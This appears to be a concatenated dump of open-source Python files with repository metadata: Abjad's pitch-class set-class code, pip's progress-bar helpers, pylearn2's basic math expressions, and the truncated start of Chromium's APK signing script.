(8, 39): (0, 2, 3, 4, 5, 6, 8, 9),
(8, 40): (0, 2, 3, 4, 5, 7, 8, 9),
(8, 41): (0, 2, 3, 4, 6, 7, 8, 9),
(8, 42): (0, 2, 3, 5, 6, 7, 8, 9),
(8, 43): (0, 2, 4, 5, 6, 7, 8, 9),
# 9
(9, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8),
(9, 2): (0, 1, 2, 3, 4, 5, 6, 7, 9),
(9, 3): (0, 1, 2, 3, 4, 5, 6, 8, 10),
(9, 4): (0, 1, 2, 3, 4, 5, 6, 8, 9),
(9, 5): (0, 1, 2, 3, 4, 5, 7, 8, 10),
(9, 6): (0, 1, 2, 3, 4, 5, 7, 8, 9),
(9, 7): (0, 1, 2, 3, 4, 5, 7, 9, 10),
(9, 8): (0, 1, 2, 3, 4, 6, 7, 8, 10),
(9, 9): (0, 1, 2, 3, 4, 6, 7, 8, 9),
(9, 10): (0, 1, 2, 3, 4, 6, 7, 9, 10),
(9, 11): (0, 1, 2, 3, 4, 6, 8, 9, 10),
(9, 12): (0, 1, 2, 3, 5, 6, 7, 8, 10),
(9, 13): (0, 1, 2, 3, 5, 6, 7, 8, 9),
(9, 14): (0, 1, 2, 3, 5, 6, 7, 9, 10),
(9, 15): (0, 1, 2, 3, 5, 6, 8, 9, 10),
(9, 16): (0, 1, 2, 4, 5, 6, 7, 8, 9),
(9, 17): (0, 1, 2, 4, 5, 6, 8, 9, 10),
(9, 18): (0, 1, 3, 4, 5, 6, 7, 8, 9),
(9, 19): (0, 2, 3, 4, 5, 6, 7, 8, 9),
# 10
(10, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8, 10),
(10, 2): (0, 1, 2, 3, 4, 5, 6, 7, 8, 9),
(10, 3): (0, 1, 2, 3, 4, 5, 6, 7, 9, 10),
(10, 4): (0, 1, 2, 3, 4, 5, 6, 8, 9, 10),
(10, 5): (0, 1, 2, 3, 4, 5, 7, 8, 9, 10),
(10, 6): (0, 1, 2, 3, 4, 6, 7, 8, 9, 10),
# 11
(11, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10),
# 12
(12, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11),
}
assert len(_transposition_only_identifier_to_prime_form) == 352
_prime_form_to_forte_identifier = {
v: k for k, v in _forte_identifier_to_prime_form.items()
}
_prime_form_to_lex_identifier = {
v: k for k, v in _lex_identifier_to_prime_form.items()
}
_prime_form_to_transposition_only_identifier = {
v: k for k, v in _transposition_only_identifier_to_prime_form.items()
}
### INITIALIZER ###
def __init__(
self, cardinality=1, rank=1, *, lex_rank=None, transposition_only=None
):
if bool(transposition_only) and lex_rank is False:
raise Exception("SG1 set-classes are always lex-rank.")
cardinality = int(cardinality)
assert 0 <= cardinality <= 12, repr(cardinality)
self._cardinality = cardinality
rank = int(rank)
assert 1 <= rank, repr(rank)
self._rank = rank
assert isinstance(lex_rank, (type(None), type(True)))
self._lex_rank = lex_rank
assert isinstance(transposition_only, (type(None), type(True)))
self._transposition_only = transposition_only
prime_form = self._unrank(
self.cardinality,
self.rank,
transposition_only=self.transposition_only,
)
self._prime_form = prime_form
### SPECIAL METHODS ###
def __eq__(self, argument) -> bool:
"""
Is true when all initialization values of Abjad value object equal
the initialization values of ``argument``.
"""
return StorageFormatManager.compare_objects(self, argument)
def __hash__(self) -> int:
"""
Hashes Abjad value object.
"""
hash_values = StorageFormatManager(self).get_hash_values()
try:
result = hash(hash_values)
except TypeError:
raise TypeError(f"unhashable type: {self}")
return result
def __repr__(self) -> str:
"""
Gets interpreter representation.
"""
return StorageFormatManager(self).get_repr_format()
def __str__(self):
"""
Gets string representation.
.. container:: example
Gets string of SG2 set-class with Forte rank:
>>> set_class = abjad.SetClass(4, 29)
>>> print(set_class)
SC(4-29){0, 1, 3, 7}
.. container:: example
Gets string of SG2 set-class with lex rank:
>>> set_class = abjad.SetClass(
... 4, 29,
... lex_rank=True,
... )
>>> print(set_class)
SC(4-29){0, 3, 6, 9}
.. container:: example
Gets string of SG1 set-class:
>>> set_class = abjad.SetClass(
... 4, 29,
... transposition_only=True,
... )
>>> print(set_class)
SC(4-29){0, 2, 6, 7}
Returns string.
"""
string = f"SC({self.cardinality}-{self.rank}){self.prime_form!s}"
string = string.replace("PC", "")
return string
### PRIVATE METHODS ###
@staticmethod
def _classify_set_classes():
"""
Was only necessary to run during implementation of SetClass.
Generated the ...
_forte_identifier_to_prime_form
_lex_identifier_to_prime_form
_transposition_only_identifier_to_prime_form
... dictionaries attached as class attributes.
Archived here in case other identifier systems are needed in future.
"""
all_prime_forms = {}
for cardinality in range(12 + 1):
all_prime_forms[cardinality] = set()
for pc_set in SetClass._yield_all_pitch_class_sets():
if NumberedPitchClass(0) not in pc_set:
if 0 < len(pc_set):
continue
prime_form = pc_set.get_prime_form(transposition_only=True)
all_prime_forms[prime_form.cardinality].add(prime_form)
total = 0
for cardinality in range(12 + 1):
count = len(all_prime_forms[cardinality])
total += count
for cardinality in range(12 + 1):
prime_forms = list(all_prime_forms[cardinality])
prime_forms.sort(key=lambda x: str(x))
for index, prime_form in enumerate(prime_forms):
rank = index + 1
prime_form = str(prime_form)
prime_form = prime_form.replace("{", "(")
prime_form = prime_form.replace("}", ")")
message = f"({cardinality}, {rank}): {prime_form},"
print(message)
print()
message = f"total set-classes: {total}"
print(message)
print()
def _unrank(self, cardinality, rank, transposition_only=None):
pair = (cardinality, rank)
if self.transposition_only:
prime_form = self._transposition_only_identifier_to_prime_form[pair]
elif self.lex_rank:
prime_form = self._lex_identifier_to_prime_form[pair]
else:
prime_form = self._forte_identifier_to_prime_form[pair]
prime_form = PitchClassSet(items=prime_form, item_class=NumberedPitchClass)
return prime_form
@staticmethod
def _yield_all_pitch_class_sets():
def _helper(binary_string):
result = zip(binary_string, range(len(binary_string)))
result = [string[1] for string in result if string[0] == "1"]
return result
for i in range(4096):
string = math.integer_to_binary_string(i).zfill(12)
subset = "".join(list(reversed(string)))
subset = _helper(subset)
subset = PitchClassSet(subset, item_class=NumberedPitchClass)
yield subset
### PUBLIC PROPERTIES ###
@property
def cardinality(self):
"""
Gets cardinality.
.. container:: example
Gets cardinality of SG2 set-class with Forte rank:
>>> set_class = abjad.SetClass(4, 29)
>>> print(set_class)
SC(4-29){0, 1, 3, 7}
>>> set_class.cardinality
4
.. container:: example
Gets cardinality of SG2 set-class with lex rank:
>>> set_class = abjad.SetClass(
... 4, 29,
... lex_rank=True,
... )
>>> print(set_class)
SC(4-29){0, 3, 6, 9}
>>> set_class.cardinality
4
.. container:: example
Gets cardinality of SG1 set-class:
>>> set_class = abjad.SetClass(
... 4, 29,
... transposition_only=True,
... )
>>> print(set_class)
SC(4-29){0, 2, 6, 7}
>>> set_class.cardinality
4
Set to integer between 0 and 12, inclusive.
Returns integer between 0 and 12, inclusive.
"""
return self._cardinality
@property
def is_inversion_equivalent(self):
"""
Is true when set-class is inversion-equivalent.
.. container:: example
Is inversion-equivalent:
>>> set_class = abjad.SetClass(4, 29)
>>> print(set_class)
SC(4-29){0, 1, 3, 7}
>>> pitch_class_set = set_class.prime_form
>>> inverted_pitch_class_set = pitch_class_set.invert()
>>> inverted_set_class = abjad.SetClass.from_pitch_class_set(
... inverted_pitch_class_set
... )
>>> print(inverted_set_class)
SC(4-29){0, 1, 3, 7}
>>> set_class.is_inversion_equivalent
True
.. container:: example
Is inversion-equivalent:
>>> set_class = abjad.SetClass(
... 4, 29,
... lex_rank=True,
... )
>>> print(set_class)
SC(4-29){0, 3, 6, 9}
>>> pitch_class_set = set_class.prime_form
>>> inverted_pitch_class_set = pitch_class_set.invert()
>>> inverted_set_class = abjad.SetClass.from_pitch_class_set(
... inverted_pitch_class_set,
... lex_rank=True,
... )
>>> print(inverted_set_class)
SC(4-29){0, 3, 6, 9}
>>> set_class.is_inversion_equivalent
True
.. container:: example
Is not inversion-equivalent:
>>> set_class = abjad.SetClass(
... 4, 29,
... transposition_only=True,
... )
>>> print(set_class)
SC(4-29){0, 2, 6, 7}
>>> pitch_class_set = set_class.prime_form
>>> inverted_pitch_class_set = pitch_class_set.invert()
>>> inverted_set_class = abjad.SetClass.from_pitch_class_set(
... inverted_pitch_class_set,
... transposition_only=True,
... )
>>> print(inverted_set_class)
SC(4-15){0, 1, 5, 7}
>>> set_class.is_inversion_equivalent
False
Returns true or false.
"""
prime_form = self.prime_form
inverted_pitch_class_set = prime_form.invert()
inverted_set_class = type(self).from_pitch_class_set(
inverted_pitch_class_set,
lex_rank=self.lex_rank,
transposition_only=self.transposition_only,
)
return self == inverted_set_class
@property
def lex_rank(self):
"""
Is true when set-class uses lex rank.
.. container:: example
Uses Forte rank:
>>> set_class = abjad.SetClass(4, 29)
>>> set_class
SetClass(cardinality=4, rank=29)
>>> print(set_class)
SC(4-29){0, 1, 3, 7}
.. container:: example
Uses lex rank:
>>> set_class = abjad.SetClass(
... 4, 29,
... lex_rank=True,
... )
>>> set_class
SetClass(cardinality=4, rank=29, lex_rank=True)
>>> print(set_class)
SC(4-29){0, 3, 6, 9}
.. container:: example
SG1 set-classes always use lex rank:
>>> set_class = abjad.SetClass(
... 4, 29,
... transposition_only=True,
... )
>>> set_class
SetClass(cardinality=4, rank=29, transposition_only=True)
>>> print(set_class)
SC(4-29){0, 2, 6, 7}
Set to true, false or none.
Defaults to none.
Returns true, false or none.
"""
return self._lex_rank
@property
def prime_form(self):
"""
Gets prime form.
.. container:: example
Gets prime form of SG2 set-class with Forte rank:
>>> set_class = abjad.SetClass(4, 29)
>>> print(set_class)
SC(4-29){0, 1, 3, 7}
>>> set_class.prime_form
PitchClassSet([0, 1, 3, 7])
.. container:: example
Gets prime form of SG2 set-class with lex rank:
>>> set_class = abjad.SetClass(
... 4, 29,
... lex_rank=True,
... )
>>> print(set_class)
SC(4-29){0, 3, 6, 9}
>>> set_class.prime_form
PitchClassSet([0, 3, 6, 9])
.. container:: example
Gets prime form of SG1 set-class:
>>> set_class = abjad.SetClass(
... 4, 29,
... transposition_only=True,
... )
>>> print(set_class)
SC(4-29){0, 2, 6, 7}
>>> set_class.prime_form
PitchClassSet([0, 2, 6, 7])
Returns numbered pitch-class set.
"""
return self._prime_form
@property
def rank(self):
"""
Gets rank.
.. container:: example
Gets rank of SG2 set-class with Forte rank:
>>> set_class = abjad.SetClass(4, 29)
>>> print(set_class)
SC(4-29){0, 1, 3, 7}
>>> set_class.rank
29
.. container:: example
Gets rank of SG2 set-class with lex rank:
>>> set_class = abjad.SetClass(
... 4, 29,
... lex_rank=True,
... )
>>> print(set_class)
SC(4-29){0, 3, 6, 9}
>>> set_class.rank
29
.. container:: example
Gets rank of SG1 set-class:
>>> set_class = abjad.SetClass(
... 4, 29,
... transposition_only=True,
... )
>>> print(set_class)
SC(4-29){0, 2, 6, 7}
>>> set_class.rank
29
Set to positive integer.
Returns positive integer.
"""
return self._rank
@property
def transposition_only(self):
"""
Is true when set-class collects pitch-class sets related only by
transposition.
.. container:: example
Initializes SG2 set-class with Forte rank:
>>> set_class = abjad.SetClass(4, 29)
>>> print(set_class)
SC(4-29){0, 1, 3, 7}
.. container:: example
Initializes SG2 set-class with lex rank:
>>> set_class = abjad.SetClass(
... 4, 29,
... lex_rank=True,
... )
>>> print(set_class)
SC(4-29){0, 3, 6, 9}
.. container:: example
Initializes SG1 set-class:
>>> set_class = abjad.SetClass(
... 4, 29,
... transposition_only=True,
... )
>>> print(set_class)
SC(4-29){0, 2, 6, 7}
Set to true, false or none.
Defaults to none.
Returns true, false or none.
"""
return self._transposition_only
### PUBLIC METHODS ###
# TODO: change to from_selection()
@staticmethod
def from_pitch_class_set(pitch_class_set, lex_rank=None, transposition_only=None):
"""
Makes set-class from ``pitch_class_set``.
.. container:: example
>>> pc_set = abjad.PitchClassSet([9, 0, 3, 5, 6])
>>> set_class = abjad.SetClass.from_pitch_class_set(pc_set)
>>> print(set_class)
SC(5-31){0, 1, 3, 6, 9}
>>> pc_set = abjad.PitchClassSet([9, 0, 3, 5, 6])
>>> set_class = abjad.SetClass.from_pitch_class_set(
... pc_set,
... lex_rank=True,
... )
>>> print(set_class)
SC(5-22){0, 1, 3, 6, 9}
>>> pc_set = abjad.PitchClassSet([9, 0, 3, 5, 6])
>>> set_class = abjad.SetClass.from_pitch_class_set(
... pc_set,
... transposition_only=True,
... )
>>> print(set_class)
SC(5-44){0, 2, 3, 6, 9}
.. container:: example
>>> pc_set = abjad.PitchClassSet([9, 11, 1, 2, 4, 6])
>>> set_class = abjad.SetClass.from_pitch_class_set(pc_set)
>>> print(set_class)
SC(6-32){0, 2, 4, 5, 7, 9}
>>> pc_set = abjad.PitchClassSet([9, 11, 1, 2, 4, 6])
>>> set_class = abjad.SetClass.from_pitch_class_set(
... pc_set,
... lex_rank=True,
... )
>>> print(set_class)
SC(6-49){0, 2, 4, 5, 7, 9}
>>> pc_set = abjad.PitchClassSet([9, 11, 1, 2, 4, 6])
>>> set_class = abjad.SetClass.from_pitch_class_set(
... pc_set,
... transposition_only=True,
... )
>>> print(set_class)
SC(6-70){0, 2, 4, 5, 7, 9}
.. container:: example
>>> pc_set = abjad.PitchClassSet([11, 0, 5, 6])
>>> set_class = abjad.SetClass.from_pitch_class_set(pc_set)
>>> print(set_class)
SC(4-9){0, 1, 6, 7}
>>> pc_set = abjad.PitchClassSet([11, 0, 5, 6])
>>> set_class = abjad.SetClass.from_pitch_class_set(
... pc_set,
... lex_rank=True,
... )
>>> print(set_class)
SC(4-17){0, 1, 6, 7}
>>> pc_set = abjad.PitchClassSet([11, 0, 5, 6])
>>> set_class = abjad.SetClass.from_pitch_class_set(
... pc_set,
... transposition_only=True,
... )
>>> print(set_class)
SC(4-17){0, 1, 6, 7}
.. container:: example
>>> pc_set = abjad.PitchClassSet([0, 4, 7])
>>> set_class = abjad.SetClass.from_pitch_class_set(pc_set)
>>> print(set_class)
SC(3-11){0, 3, 7}
>>> pc_set = abjad.PitchClassSet([0, 4, 7])
>>> set_class = abjad.SetClass.from_pitch_class_set(
... pc_set,
... lex_rank=True,
... )
>>> print(set_class)
SC(3-11){0, 3, 7}
>>> pc_set = abjad.PitchClassSet([0, 4, 7])
>>> set_class = abjad.SetClass.from_pitch_class_set(
... pc_set,
... transposition_only=True,
... )
>>> print(set_class)
SC(3-17){0, 4, 7}
Returns set-class.
"""
pitch_class_set = PitchClassSet(
items=pitch_class_set, item_class=NumberedPitchClass
)
prime_form = pitch_class_set.get_prime_form(
transposition_only=transposition_only
)
prime_form = tuple([_.number for _ in sorted(prime_form)])
if transposition_only:
pair = SetClass._prime_form_to_transposition_only_identifier[prime_form]
elif lex_rank:
pair = SetClass._prime_form_to_lex_identifier[prime_form]
else:
pair = SetClass._prime_form_to_forte_identifier[prime_form]
cardinality, rank = pair
set_class = SetClass(
cardinality=cardinality,
rank=rank,
lex_rank=lex_rank,
transposition_only=transposition_only,
)
return set_class
@staticmethod
def list_set_classes(cardinality=None, lex_rank=None, transposition_only=None):
"""
List set-classes.
.. container:: example
Lists SG2 set-classes of cardinality 4 with Forte rank:
>>> set_classes = abjad.SetClass.list_set_classes(
... cardinality=4,
... )
>>> for set_class in set_classes:
... print(set_class)
SC(4-1){0, 1, 2, 3}
SC(4-2){0, 1, 2, 4}
SC(4-3){0, 1, 3, 4}
SC(4-4){0, 1, 2, 5}
SC(4-5){0, 1, 2, 6}
SC(4-6){0, 1, 2, 7}
SC(4-7){0, 1, 4, 5}
SC(4-8){0, 1, 5, 6}
SC(4-9){0, 1, 6, 7}
SC(4-10){0, 2, 3, 5}
SC(4-11){0, 1, 3, 5}
SC(4-12){0, 2, 3, 6}
SC(4-13){0, 1, 3, 6}
SC(4-14){0, 2, 3, 7}
SC(4-15){0, 1, 4, 6}
SC(4-16){0, 1, 5, 7}
SC(4-17){0, 3, 4, 7}
SC(4-18){0, 1, 4, 7}
SC(4-19){0, 1, 4, 8}
SC(4-20){0, 1, 5, 8}
SC(4-21){0, 2, 4, 6}
SC(4-22){0, 2, 4, 7}
SC(4-23){0, 2, 5, 7}
SC(4-24){0, 2, 4, 8}
SC(4-25){2, 6, 8, 9}
SC(4-26){0, 3, 5, 8}
SC(4-27){0, 2, 5, 8}
SC(4-28){0, 3, 6, 9}
SC(4-29){0, 1, 3, 7}
.. container:: example
Lists SG2 set-classes of cardinality 4 with lex rank:
>>> set_classes = abjad.SetClass.list_set_classes(
... cardinality=4,
... lex_rank=True,
... )
>>> for set_class in set_classes:
... print(set_class)
SC(4-1){0, 1, 2, 3}
SC(4-2){0, 1, 2, 4}
SC(4-3){0, 1, 2, 5}
SC(4-4){0, 1, 2, 6}
SC(4-5){0, 1, 2, 7}
SC(4-6){0, 1, 3, 4}
SC(4-7){0, 1, 3, 5}
SC(4-8){0, 1, 3, 6}
SC(4-9){0, 1, 3, 7}
SC(4-10){0, 1, 4, 5}
SC(4-11){0, 1, 4, 6}
SC(4-12){0, 1, 4, 7}
SC(4-13){0, 1, 4, 8}
SC(4-14){0, 1, 5, 6}
SC(4-15){0, 1, 5, 7}
SC(4-16){0, 1, 5, 8}
SC(4-17){0, 1, 6, 7}
SC(4-18){0, 2, 3, 5}
SC(4-19){0, 2, 3, 6}
SC(4-20){0, 2, 3, 7}
SC(4-21){0, 2, 4, 6}
SC(4-22){0, 2, 4, 7}
SC(4-23){0, 2, 4, 8}
SC(4-24){0, 2, 5, 7}
SC(4-25){0, 2, 5, 8}
SC(4-26){0, 2, 6, 8}
SC(4-27){0, 3, 4, 7}
SC(4-28){0, 3, 5, 8}
SC(4-29){0, 3, 6, 9}
.. container:: example
Lists SG1 set-classes of cardinality 4:
>>> set_classes = abjad.SetClass.list_set_classes(
... cardinality=4,
... transposition_only=True,
... )
>>> for set_class in set_classes:
... print(set_class)
SC(4-1){0, 1, 2, 3}
SC(4-2){0, 1, 2, 4}
SC(4-3){0, 1, 2, 5}
SC(4-4){0, 1, 2, 6}
SC(4-5){0, 1, 2, 7}
SC(4-6){0, 1, 3, 4}
SC(4-7){0, 1, 3, 5}
SC(4-8){0, 1, 3, 6}
SC(4-9){0, 1, 3, 7}
SC(4-10){0, 1, 4, 5}
SC(4-11){0, 1, 4, 6}
SC(4-12){0, 1, 4, 7}
SC(4-13){0, 1, 4, 8}
SC(4-14){0, 1, 5, 6}
SC(4-15){0, 1, 5, 7}
SC(4-16){0, 1, 5, 8}
SC(4-17){0, 1, 6, 7}
SC(4-18){0, 2, 3, 4}
SC(4-19){0, 2, 3, 5}
SC(4-20){0, 2, 3, 6}
SC(4-21){0, 2, 3, 7}
SC(4-22){0, 2, 4, 5}
SC(4-23){0, 2, 4, 6}
SC(4-24){0, 2, 4, 7}
SC(4-25){0, 2, 4, 8}
SC(4-26){0, 2, 5, 6}
SC(4-27){0, 2, 5, 7}
SC(4-28){0, 2, 5, 8}
SC(4-29){0, 2, 6, 7}
SC(4-30){0, 2, 6, 8}
SC(4-31){0, 3, 4, 5}
SC(4-32){0, 3, 4, 6}
SC(4-33){0, 3, 4, 7}
SC(4-34){0, 3, 4, 8}
SC(4-35){0, 3, 5, 6}
SC(4-36){0, 3, 5, 7}
SC(4-37){0, 3, 5, 8}
SC(4-38){0, 3, 6, 7}
SC(4-39){0, 3, 6, 8}
SC(4-40){0, 3, 6, 9}
SC(4-41){0, 4, 5, 6}
SC(4-42){0, 4, 5, 7}
SC(4-43){0, 4, 6, 7}
Returns list of set-classes.
"""
if transposition_only:
identifiers = SetClass._transposition_only_identifier_to_prime_form
elif lex_rank:
identifiers = SetClass._lex_identifier_to_prime_form
else:
identifiers = SetClass._forte_identifier_to_prime_form
identifiers = list(identifiers)
if cardinality is not None:
identifiers = [_ for _ in identifiers if _[0] == cardinality]
set_classes = []
for identifier in sorted(identifiers):
cardinality, rank = identifier
set_class = SetClass(
cardinality,
rank,
lex_rank=lex_rank,
transposition_only=transposition_only,
)
set_classes.append(set_class)
return set_classes
| gpl-3.0 |
Conflei/ATI | [ATI] Misfenterest/Frontend/venv/lib/python2.6/site-packages/pip/_vendor/progress/helpers.py | 404 | 2894 | # Copyright (c) 2012 Giorgos Verigakis <verigak@gmail.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from __future__ import print_function
from __future__ import unicode_literals
HIDE_CURSOR = '\x1b[?25l'
SHOW_CURSOR = '\x1b[?25h'
class WriteMixin(object):
hide_cursor = False
def __init__(self, message=None, **kwargs):
super(WriteMixin, self).__init__(**kwargs)
self._width = 0
if message:
self.message = message
if self.file.isatty():
if self.hide_cursor:
print(HIDE_CURSOR, end='', file=self.file)
print(self.message, end='', file=self.file)
self.file.flush()
def write(self, s):
if self.file.isatty():
b = '\b' * self._width
c = s.ljust(self._width)
print(b + c, end='', file=self.file)
self._width = max(self._width, len(s))
self.file.flush()
def finish(self):
if self.file.isatty() and self.hide_cursor:
print(SHOW_CURSOR, end='', file=self.file)
class WritelnMixin(object):
hide_cursor = False
def __init__(self, message=None, **kwargs):
super(WritelnMixin, self).__init__(**kwargs)
if message:
self.message = message
if self.file.isatty() and self.hide_cursor:
print(HIDE_CURSOR, end='', file=self.file)
def clearln(self):
if self.file.isatty():
print('\r\x1b[K', end='', file=self.file)
def writeln(self, line):
if self.file.isatty():
self.clearln()
print(line, end='', file=self.file)
self.file.flush()
def finish(self):
if self.file.isatty():
print(file=self.file)
if self.hide_cursor:
print(SHOW_CURSOR, end='', file=self.file)
from signal import signal, SIGINT
from sys import exit
class SigIntMixin(object):
"""Registers a signal handler that calls finish on SIGINT"""
def __init__(self, *args, **kwargs):
super(SigIntMixin, self).__init__(*args, **kwargs)
signal(SIGINT, self._sigint_handler)
def _sigint_handler(self, signum, frame):
self.finish()
exit(0)
| mit |
lamblin/pylearn2 | pylearn2/expr/basic.py | 39 | 9028 | """
Very simple and basic mathematical expressions used often throughout the library.
"""
__authors__ = "Ian Goodfellow and Razvan Pascanu"
__copyright__ = "Copyright 2013, Universite de Montreal"
__credits__ = ["Ian Goodfellow and Razvan Pascanu"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
__email__ = "pylearn-dev@googlegroups"
import numpy as np
import theano.tensor as T
import warnings
from pylearn2.blocks import Block
from pylearn2.utils import as_floatX, constantX
def numpy_norms(W):
"""
.. todo::
WRITEME properly
returns a vector containing the L2 norm of each
column of W, where W and the return value are
numpy ndarrays
"""
return np.sqrt(1e-8+np.square(W).sum(axis=0))
def theano_norms(W):
"""
.. todo::
WRITEME properly
returns a vector containing the L2 norm of each
column of W, where W and the return value are symbolic
theano variables
"""
return T.sqrt(as_floatX(1e-8)+T.sqr(W).sum(axis=0))
def full_min(var):
"""
.. todo::
WRITEME properly
returns a symbolic expression for the value of the minimal
element of symbolic tensor. T.min does something else as of
the time of this writing.
"""
return var.min(axis=range(0,len(var.type.broadcastable)))
def full_max(var):
"""
.. todo::
WRITEME properly
returns a symbolic expression for the value of the maximal
element of a symbolic tensor. T.max does something else as of the
time of this writing.
"""
return var.max(axis=range(0,len(var.type.broadcastable)))
def multiple_switch(*args):
"""
.. todo::
WRITEME properly
Applies a cascade of ifelse. The output will be a Theano expression
which evaluates:
.. code-block:: none
if args0:
then arg1
elif arg2:
then arg3
elif arg4:
then arg5
....
"""
if len(args) == 3:
return T.switch(*args)
else:
return T.switch(args[0],
args[1],
multiple_switch(*args[2:]))
def symGivens2(a, b):
"""
Stable Symmetric Givens rotation plus reflection
Parameters
----------
a : theano scalar
first element of a two-vector [a; b]
b : theano scalar
second element of a two-vector [a; b]
Returns
-------
c : WRITEME
cosine(theta), where theta is the implicit angle of
rotation (counter-clockwise) in a plane-rotation
s : WRITEME
sine(theta)
d : WRITEME
two-norm of [a; b]
Notes
-----
* See also:
- Algorithm 4.9, stable *unsymmetric* Givens rotations in Golub
and van Loan's book Matrix Computations, 3rd edition.
- MATLAB's function PLANEROT.
* This method gives c and s such that
.. math::
\\begin{pmatrix} c & s \\\ s & -c \\end{pmatrix}
\\begin{pmatrix} a \\\ b \\end{pmatrix} =
\\begin{pmatrix} d \\\ 0 \\end{pmatrix}
where
:math:`d = \\left\Vert \\begin{pmatrix} a \\\ b \\end{pmatrix}
\\right\Vert _{2}`,
:math:`c = a / \sqrt{a^2 + b^2} = a / d`,
:math:`s = b / \sqrt{a^2 + b^2} = b / d`.
The implementation guards against overflow in computing
:math:`\sqrt{a^2 + b^2}`.
* Observation: Implementing this function as a single op in C might
improve speed considerably .
"""
c_branch1 = T.switch(T.eq(a, constantX(0)),
constantX(1),
T.sgn(a))
c_branch21 = (a / b) * T.sgn(b) / \
T.sqrt(constantX(1) + (a / b) ** 2)
c_branch22 = T.sgn(a) / T.sqrt(constantX(1) + (b / a) ** 2)
c_branch2 = T.switch(T.eq(a, constantX(0)),
constantX(0),
T.switch(T.gt(abs(b), abs(a)),
c_branch21,
c_branch22))
c = T.switch(T.eq(b, constantX(0)),
c_branch1,
c_branch2)
s_branch1 = T.sgn(b) / T.sqrt(constantX(1) + (a / b) ** 2)
s_branch2 = (b / a) * T.sgn(a) / T.sqrt(constantX(1) + (b / a) ** 2)
s = T.switch(T.eq(b, constantX(0)),
constantX(0),
T.switch(T.eq(a, constantX(0)),
T.sgn(b),
T.switch(T.gt(abs(b), abs(a)),
s_branch1,
s_branch2)))
d_branch1 = b / (T.sgn(b) / T.sqrt(constantX(1) + (a / b) ** 2))
d_branch2 = a / (T.sgn(a) / T.sqrt(constantX(1) + (b / a) ** 2))
d = T.switch(T.eq(b, constantX(0)),
abs(a),
T.switch(T.eq(a, constantX(0)),
abs(b),
T.switch(T.gt(abs(b), abs(a)),
d_branch1,
d_branch2)))
return c, s, d
def sqrt_inner_product(xs, ys=None):
"""
.. todo::
WRITEME properly
Compute the square root of the inner product between `xs` and `ys`.
If `ys` is not provided, computes the norm between `xs` and `xs`.
Since `xs` and `ys` are list of tensor, think of it as the norm
between the vector obtain by concatenating and flattening all
tenors in `xs` and the similar vector obtain from `ys`. Note that
`ys` should match `xs`.
Parameters
----------
xs : list of theano expressions
WRITEME
ys : None or list of theano expressions, optional
WRITEME
"""
if ys is None:
ys = [x for x in xs]
return T.sqrt(sum((x * y).sum() for x, y in zip(xs, ys)))
def inner_product(xs, ys=None):
"""
.. todo::
WRITEME properly
Compute the inner product between `xs` and `ys`. If ys is not provided,
computes the square norm between `xs` and `xs`.
Since `xs` and `ys` are list of tensor, think of it as the inner
product between the vector obtain by concatenating and flattening all
tenors in `xs` and the similar vector obtain from `ys`. Note that
`ys` should match `xs`.
Parameters
----------
xs : list of theano expressions
WRITEME
ys : None or list of theano expressions, optional
WRITEME
"""
if ys is None:
ys = [x for x in xs]
return sum((x * y).sum() for x, y in zip(xs, ys))
def is_binary(x):
"""
.. todo::
WRITEME
"""
return np.all( (x == 0) + (x == 1))
def log_sum_exp(A=None, axis=None, log_A=None):
"""
A numerically stable expression for
`T.log(T.exp(A).sum(axis=axis))`
Parameters
----------
A : theano.gof.Variable
A tensor we want to compute the log sum exp of
axis : int, optional
Axis along which to sum
log_A : deprecated
`A` used to be named `log_A`. We are removing the `log_A`
interface because there is no need for the input to be
the output of theano.tensor.log. The only change is the
renaming, i.e. the value of log_sum_exp(log_A=foo) has
not changed, and log_sum_exp(A=foo) is equivalent to
log_sum_exp(log_A=foo).
Returns
-------
log_sum_exp : theano.gof.Variable
The log sum exp of `A`
"""
if log_A is not None:
assert A is None
warnings.warn("log_A is deprecated, and will be removed on or"
"after 2015-08-09. Switch to A")
A = log_A
del log_A
A_max = T.max(A, axis=axis, keepdims=True)
B = (
T.log(T.sum(T.exp(A - A_max), axis=axis, keepdims=True)) +
A_max
)
if axis is None:
return B.dimshuffle(())
else:
if type(axis) is int:
axis = [axis]
return B.dimshuffle([i for i in range(B.ndim) if
i % B.ndim not in axis])
class Identity(Block):
"""
A Block that computes the identity transformation. Mostly useful as
a placeholder.
Parameters
----------
input_space : WRITEME
"""
def __init__(self, input_space=None):
super(Identity, self).__init__()
self.input_space = input_space
def __call__(self, inputs):
"""
.. todo::
WRITEME
"""
if self.input_space:
self.input_space.validate(inputs)
return inputs
def set_input_space(self, space):
"""
.. todo::
WRITEME
"""
self.input_space = space
def get_input_space(self):
"""
.. todo::
WRITEME
"""
if self.input_space is not None:
return self.input_space
raise ValueError("No input space was specified for this Block (%s). "
"You can call set_input_space to correct that." % str(self))
def get_output_space(self):
"""
.. todo::
WRITEME
"""
return self.get_input_space()
| bsd-3-clause |
gfreed/android_external_chromium-org | build/android/gyp/finalize_apk.py | 25 | 1902 | #!/usr/bin/env python
#
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Signs and zipaligns APK.
"""
import optparse
import os
import shutil
import sys
import tempfile
from util import build_utils
def SignApk(keystore_path, unsigned_path, signed_path):
shutil.copy(unsigned_path, signed_path)
sign_cmd = [
'jarsigner',
'-sigalg', 'MD5withRSA',
'-digestalg', 'SHA1',
'-keystore', keystore_path,
'-storepass', 'chromium',
signed_path,
